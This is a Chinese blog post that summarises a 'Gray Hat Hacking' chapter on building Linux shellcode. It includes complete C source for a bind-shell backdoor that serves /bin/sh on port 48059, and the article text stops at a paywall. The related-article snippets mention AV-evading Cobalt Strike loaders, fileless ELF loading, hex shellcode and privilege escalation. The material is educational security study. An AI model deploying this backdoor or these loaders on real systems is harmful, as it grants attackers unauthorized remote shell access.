shellcode基础-Linux木马构造流程

已于 2023-12-27 13:22:44 修改
阅读量929 收藏 26
点赞数 17
文章标签: 网络安全 安全
于 2023-12-13 13:46:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43988746/article/details/134945946
版权

基于《灰帽黑客(第4版)》第七章 编写 Linux shellcode 的内容构建知识框架
此处仅做知识总结,具体代码书上都有。

文章目录

编写C语言木马,编译

bind_shell木马

#include<sys/socket.h>			// libraries used to make a socket
#include<netinet/in.h>			// defines the sockaddr structure
int main(){
   
	char * shell[2];		// prep for execve call
	int server,client;		// file descriptor handles
	struct sockaddr_in serv_addr;	// structure to hold IP/port vals
	server=socket(2,1,0);	// bind a local IP socket of type stream
	serv_addr.sin_addr.s_addr=0;	// set addresses of socket to all local
	serv_addr.sin_port=0xBBBB;	// set port of socket, 48059 here
	serv_addr.sin_family=2;		// set native protocal family: IP
	bind(server,(struct sockaddr *)&serv_addr,0x10);// bind socket
	listen(server,0);		// enter listen state, wait for connect
	client=accept(server,0,0);	// when connect, return client handle
	/*connect client pipes to stdin,stdout,stderr*/
	dup2(client,0);			// connect stdin to client
	dup2(client,1);			// connect stdout to client
	dup2(client,2);			// connect stderr to client
	shell[0]="/bin/sh";		// first argument to execve
	shell[1]=0;			// terminate array with null
	execve(shell[0],shell,0);	// pop a shell
}

reverse_she

最低0.47元/天 解锁文章
BlackCoward
关注
  • 17
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux编写shellcode
duangduang2020的博客
11-21 1031
1、shellcode需要用到系统调用的调用号,可以通过unistd.h查看,具体某个系统调用的用法可以通过man syscall来查看 2、在现在的指令集中引入了syscall指令,但是原来的int 0x80调用正常可以使用。int 0x80调用将系统调用号放在eax, 参数依次放在ebx, ecx, edx, esi, edi;超过5个的将参数放在内存中,并将内存地址放在ebx寄存器中。 (
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
Linux 在内存中不接触磁盘远程加载并执行ELF(可执行和链接格式)文件
最新发布
2301_77778490的博客
09-18 196
在进行渗透测试时,Linux中ELF文件的无文件加载是一种有用的技术。这是一种相当安静的方式,可以抵御各种防病毒保护、控制系统完整性和监控内容更改硬盘的监控系统。这样,访问目标可以很容易地维护系统,留下最少的痕迹。原文地址:https://www.exploit-db.com/shellcodes/51693。连接/proc/self/fd/和我们的文件描述符。
linux下端口绑定shellcode编写与实现
weixin_33695082的博客
01-08 677
  本次实验都是基于《灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术》 实现端口绑定shellcode有下面几个步骤: (1)     创建一个TCP套接字; (2)     将该套接字绑定到攻击者指定的端口,这个端口通常会被硬编码到shellcode中; (3)     让该套接字成为侦听套接字; (4)     接受新连接; (5)     将新接受的套接字复制到s...
书写Linux下自己的shellcode
南飞的侯鸟
03-12 1055
 原    作:aleph1 翻译注释:warning3  1999/07 验证修改:scz  2000/01/13 概述:     aleph1书写了这篇经典文章,首先要向他致敬。     tt整
linux下执行shellcode
天元喜羊羊的博客
01-23 5377
参考了其他文章。   C语言代码如下: #include #include char sc[] = "\x31\xc0" "\x50" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\xb0\x0b" "\
Linuxshellcode的编写
weixin_30387663的博客
04-30 739
Linuxshellcode的编写 来源https://xz.aliyun.com/t/2052 EdvisonV/2018-02-14 22:00:42/浏览数 6638技术文章技术文章 0x01 理解系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。那么为什么要写sh...
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀...
Shellcode编译器-C/C++开发
05-26
Shellcode编译器Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且没有NULL的Shellcode,适用于Windows(x86和x64)和Linux(x86和x64)。 可以调用任何Windows AP Shellcode编译器...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
linuxshellcode编写手册
05-18
这是一本英文书籍,详细介绍了栈的结构,如何编制程序进行缓冲区溢出
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
Linux Shellcoding学习
一根火柴博客
05-17 1238
Linux系统Shellcoding编程入门
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3104
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
linux 64位 shellcode,Linux Shellcode“你好,世界!”
weixin_36249942的博客
05-12 179
小编典典注入此shellcode时,您不知道位置message:mov ecx, message在注入的过程中,它可以是任何东西,但不会如此,"Helloworld!\r\n"因为仅转储文本部分时它位于数据部分。您可以看到您的shellcode没有"Hello world!\r\n":"\xb8\x04\x00\x00\x00""\xbb\x01\x00\x00\x00""\xb9\x00\x00...
Linux ShellCode实践
基基1234的博客
02-23 1147
1. 关于ShellCode ShellCode是一段二进制代码,最早被用于获取一个shell,因此而得名。这段二进制代码可以被cpu识别并执行,也就是我们所说的机器码。因为shellcode的这个特性,漏洞攻击最早出现的方法就是栈溢出+shellcode。而今天的主题,就是向零基础者展示一段shellcode的产生与执行,帮助读者举一反三。 2. ShellCode的产生 本节涉及的环境: u...
linux 生成shellcode,书写Linux下自己的shellcode
weixin_28829339的博客
05-13 113
: movl 0x10(%ebp),%edx将NULL的地址赋给edx0x80002ce : int $0x80产生系统调用,进入核心态运行.------------------------------------------------------------------------------------看了上面的代码,现在我们可以把它精简为下面的汇编语言程序:leal string,stri...
Linux 系统下提取 ShellCode
热门推荐
CSDN
08-29 1万+
提取 Shellcode 是一种将特定功能的汇编指令序列提取成二进制代码的过程,通常用于计算机安全研究和渗透测试。代码提权思路,下面这段代码配合 chmod u+s 权限的设置,可以提权,我们可以将这段代码的汇编格式提取出来,然后将其注入到passwd等具有特权指令的目录下,然后就能完成权限的提升了。如果需要提取shellcode的话应该使用汇编来写提权代码,如下代码就是一段提权代码。发现能够获取到Root目录的权限,接着直接查询生成的机器码。接着就是测试这段代码的可用性了,如下代码;
shellcode基础
06-06
Shellcode是一种用于利用计算机漏洞的代码,通常是二进制代码,可以直接注入到受攻击的程序中,从而实现攻击者的目的。Shellcode通常用于执行远程代码、获取系统权限、窃取敏感信息等恶意行为。Shellcode的编写需要对目标系统的操作系统、CPU架构、程序语言等有深入的了解,同时需要具备一定的编程技能和安全意识。为了防止Shellcode攻击,系统管理员可以采取一系列安全措施,如限制程序的执行权限、使用防病毒软件、定期更新系统补丁等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值